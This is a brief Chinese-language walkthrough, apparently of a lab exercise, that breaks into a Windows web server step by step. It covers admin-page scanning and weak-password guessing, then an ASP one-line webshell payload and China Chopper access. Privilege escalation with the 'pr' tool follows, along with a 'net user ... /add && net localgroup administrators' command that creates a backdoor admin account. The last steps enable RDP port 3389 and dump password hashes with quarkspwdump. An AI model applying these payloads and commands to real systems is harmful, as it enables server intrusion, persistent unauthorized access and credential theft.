由于当时做的时候忘了截图,所以就直接写步骤了。
(1)先用御剑进行后台扫描,找到管理员的登陆地址。如果有robots.txt就可以不用扫描目录了
(2)先试一试比较常见的弱口令,然后打开啊D工具,进行猜解用户名和密码。
(3)用猜解出的用户名和密码登陆。
(4)找到网站的解析,随便在一个输入框内输入一句话木马,由于不知道源码是什么样子的, 所以,可以在网上将源码下载下来,然后在来构造相应的一句话木马。 "><%eval request(123)%><%' (此处可以通过过滤关键字的方法来进行防御)
(5)用中国菜刀进行连接,输入系统命令,出错,可能是目标机禁用了cmd.exe,那我们就自己上传一个cmd(再Windows/system32/cmd.exe)上去,发现可以使用系统命令了。
(6)创建一个管理员账号,创建账号失败,系统提示权限不够,可以上传一个pr提权工具(在上传cmd的同一目录下),在创建管理员账号是先输入pr"",在双引号中间输入创建管理员 账号的代码,创建成功 pr"net user zhao 1234 /add && net localgroup administrators zhao /add"
(7) 想要远程连接目标机,就需要目标机打开3389端口号,查看端口(netstat-ano)发现没有打开3389端口。
(8)尝试输入net start Telnet,失败,上传一个打开3389端口(通过注册表)的代码文件,运行上传打开3389端口号的文件(pr"3389.exe"),再查看端口,发现3389已经打开。
(9)打开运行窗口,输入mstsc,输入要连接的目标机IP地址(172.16.12.2),在输入我们刚才创建的账号和密码(zhao 1234)。(10)现在我们已经远程连接到目标机,可以直接对目标机进行操作。
(11)如果想要administrator的密码,我们可以通过嘻哈抓包来进行抓取,上传一个 quarkspwdump,在切换到目标机,cd到quarkspwdump的目录下,输入quarkspwdump.exe